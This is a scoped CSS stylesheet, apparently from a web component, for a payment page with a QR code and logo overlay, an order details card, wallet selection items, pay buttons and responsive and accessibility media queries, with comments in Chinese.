<style scoped>
.payment-container {
  font-family: 'PingFang SC', 'Helvetica Neue', Arial, sans-serif;
  min-height: 100vh;
  background: linear-gradient(135deg, #f5f7fa 0%, #e4edf5 100%);
  padding: 20px 0;
}

.container {
  max-width: 800px;
  margin: 0 auto;
  padding: 20px;
  background: white;
  border-radius: 16px;
  box-shadow: 0 10px 30px rgba(0, 0, 0, 0.08);
  box-sizing: border-box;
}

.header {
  text-align: center;
  padding: 20px 0 10px;
  border-bottom: 1px solid #f0f0f0;
  margin-bottom: 15px;
}

.header-icon {
  width: 70px;
  height: 70px;
  margin: 0 auto 20px;
  background: linear-gradient(135deg, #3498db 0%, #2ecc71 100%);
  border-radius: 50%;
  display: flex;
  align-items: center;
  justify-content: center;
  box-shadow: 0 5px 15px rgba(52, 152, 219, 0.3);
}

.header-icon i {
  color: white;
  font-size: 32px;
}

.header h1 {
  font-size: 24px;
  margin: 0 0 10px;
  color: #2c3e50;
  font-weight: 600;
}

.subtitle {
  font-size: 16px;
  color: #7f8c8d;
  margin: 0;
}

.alert-section {
  margin-bottom: 25px;
}

.alert {
  display: flex;
  align-items: center;
  background-color: #fff9e6;
  color: #8a6d3b;
  padding: 5px 20px;
  margin: 0 auto;
  border: 1px solid #ffeaa7;
  border-radius: 12px;
  font-size: 14px;
  max-width: 600px;
}

.alert i {
  margin-right: 10px;
  font-size: 18px;
  color: #f39c12;
}

/* 二维码区域优化样式 */
.qr-section {
  margin: 30px 0;
  text-align: center;
}

.qr-container {
  display: inline-block;
  max-width: 100%;
}

.qr-code-wrapper {
  display: inline-block;
  position: relative;
  margin-bottom: 15px;
}

.qr-code {
  position: relative;
  display: inline-block;
  padding: 20px;
  background: white;
  border-radius: 16px;
  box-shadow: 0 8px 25px rgba(0, 0, 0, 0.1);
  border: 1px solid #e8f4fd;
}

.qr-image {
  width: 280px;
  height: 280px;
  border-radius: 12px;
  display: block;
  background: white;
}

/* Logo覆盖层 - 确保Logo在二维码中央 */
.qr-logo-overlay {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  pointer-events: none;
  display: flex;
  align-items: center;
  justify-content: center;
}

.qr-logo-container {
  width: 60px;
  height: 60px;
  background: white;
  border-radius: 12px;
  padding: 8px;
  box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
  display: flex;
  align-items: center;
  justify-content: center;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
}

.qr-logo {
  width: 100%;
  height: 100%;
  object-fit: contain;
  border-radius: 8px;
}

.qr-instruction {
  margin-top: 15px;
}

.qr-instruction p {
  font-size: 14px;
  color: #7f8c8d;
  margin: 0;
  font-weight: 500;
}

.info-section {
  margin: 30px 0;
}

.info-card {
  background: #f8f9fa;
  border-radius: 12px;
  padding: 0;
  overflow: hidden;
}

.info-item {
  display: flex;
  justify-content: space-between;
  align-items: center;
  padding: 18px 20px;
}

.info-label {
  display: flex;
  align-items: center;
  font-size: 16px;
  color: #2c3e50;
  font-weight: 500;
}

.info-label i {
  margin-right: 10px;
  color: #3498db;
  font-size: 18px;
}

.info-value {
  font-size: 16px;
  color: #34495e;
  text-align: right;
  max-width: 60%;
  word-break: break-word;
}

.info-value.highlight {
  color: #e74c3c;
  font-weight: 600;
  font-size: 18px;
}

.divider {
  height: 1px;
  background: #e9ecef;
  margin: 0 20px;
}

.wallet-section {
  margin: 30px 0;
}

.section-title {
  margin-bottom: 20px;
}

.section-title h2 {
  font-size: 20px;
  color: #2c3e50;
  margin: 0;
  font-weight: 600;
}

.wallet-grid {
  /* display: f;
  grid-template-columns: repeat(auto-fill, minmax(160px, 1fr));
  gap: 15px; */
}

.wallet-item {
  display: flex;
  /* flex-direction: column; */
  align-items: center;
  padding: 20px 15px;
  border: 2px solid #e9ecef;
  border-radius: 12px;
  cursor: pointer;
  transition: all 0.3s ease;
  background: white;
  position: relative;
}

.wallet-item:hover {
  border-color: #3498db;
  transform: translateY(-2px);
  box-shadow: 0 5px 15px rgba(0, 0, 0, 0.08);
}

.wallet-item.selected {
  border-color: #3498db;
  background: #f0f8ff;
}

.wallet-content {
  display: flex;
  /* flex-direction: column; */
  align-items: center;
  /* margin-bottom: 10px; */
}

.wallet-item img {
  width: 40px;
  height: 40px;
  border-radius: 10px;
  /* margin-bottom: 10px; */
}

.wallet-item span {
  font-size: 14px;
  color: #2c3e50;
  text-align: center;
  font-weight: 500;
  margin-left: 10px;
}

.radio-indicator {
  /* position: absolute; */
  top: 10px;
  right: 10px;
}

.radio-outer {
  width: 20px;
  height: 20px;
  border: 2px solid #bdc3c7;
  border-radius: 50%;
  display: flex;
  align-items: center;
  justify-content: center;
  transition: all 0.3s ease;
}

.wallet-item.selected .radio-outer {
  border-color: #3498db;
  background: #3498db;
}

.radio-inner {
  width: 10px;
  height: 10px;
  background: white;
  border-radius: 50%;
}

.action-section {
  margin: 30px 0 10px;
}

.pay-button,
.pay-approvalbutton {
  width: 100%;
  background: linear-gradient(135deg, #3498db 0%, #2980b9 100%);
  color: white;
  padding: 16px;
  border: none;
  border-radius: 12px;
  cursor: pointer;
  text-align: center;
  font-size: 18px;
  font-weight: 600;
  transition: all 0.3s ease;
  box-shadow: 0 5px 15px rgba(52, 152, 219, 0.3);
}

.pay-button:hover,
.pay-approvalbutton:hover {
  transform: translateY(-2px);
  box-shadow: 0 8px 20px rgba(52, 152, 219, 0.4);
}

.pay-button:active,
.pay-approvalbutton:active {
  transform: translateY(0);
}

.pay-button:disabled {
  background: #bdc3c7;
  cursor: not-allowed;
  transform: none;
  box-shadow: none;
}

.product-image-section {
  margin: 25px 0;
}

.product-image-container {
  display: flex;
  justify-content: center;
  align-items: center;
}

.product-image {
  width: 300px;
  height: 200px;
  overflow: hidden;
  box-shadow: 0 5px 20px rgba(231, 76, 60, 0.3);
  border-radius: 12px;
}

.product-image img {
  width: 100%;
  height: 100%;
  object-fit: cover;
  border-radius: 12px;
}

/* 图标样式 */
.icon-wallet:before {
  content: "💰";
}

.icon-info:before {
  content: "ℹ️";
}

.icon-product:before {
  content: "📦";
}

.icon-details:before {
  content: "📝";
}

.icon-quantity:before {
  content: "🔢";
}

.icon-amount:before {
  content: "💵";
}

/* 响应式设计 */
@media (max-width: 768px) {
  .payment-container {
    padding: 10px;
    background: #f5f7fa;
  }

  .container {
    padding: 20px 15px;
    border-radius: 12px;
  }

  .header {
    padding: 15px 0 10px;
  }

  .header h1 {
    font-size: 20px;
  }

  .subtitle {
    font-size: 14px;
  }

  .qr-image {
    width: 240px;
    height: 240px;
  }

  .qr-logo-container {
    width: 50px;
    height: 50px;
  }

  .info-item {
    padding: 15px;
    display: flex;
    justify-content: space-between;
    align-items: flex-start;
  }

  .info-label {
    margin-bottom: 5px;
  }

  .info-value {
    max-width: 100%;
    text-align: left;
  }

  .wallet-grid {
    grid-template-columns: repeat(2, 1fr);
    gap: 10px;
  }

  .wallet-item {
    padding: 15px 10px;
  }

  .product-image {
    width: 100%;
    max-width: 300px;
  }

  .pay-button,
  .pay-approvalbutton {
    padding: 14px;
    font-size: 16px;
  }
}

@media (max-width: 480px) {
  .wallet-grid {
    grid-template-columns: 1fr;
  }

  .header-icon {
    width: 60px;
    height: 60px;
  }

  .header-icon i {
    font-size: 28px;
  }

  .qr-image {
    width: 200px;
    height: 200px;
  }

  .qr-logo-container {
    width: 45px;
    height: 45px;
    padding: 6px;
  }
}

/* 动画效果 */
@keyframes qrAppear {
  0% {
    opacity: 0;
    transform: scale(0.9);
  }

  100% {
    opacity: 1;
    transform: scale(1);
  }
}

.qr-code {
  animation: qrAppear 0.5s ease-out;
}

/* 高对比度模式支持 */
@media (prefers-contrast: high) {
  .qr-code {
    border: 2px solid #000;
  }

  .qr-logo-container {
    border: 1px solid #000;
  }
}

/* 减少动画模式 */
@media (prefers-reduced-motion: reduce) {
  .qr-code {
    animation: none;
  }

  .wallet-item:hover {
    transform: none;
  }

  .pay-button:hover,
  .pay-approvalbutton:hover {
    transform: none;
  }
}
</style>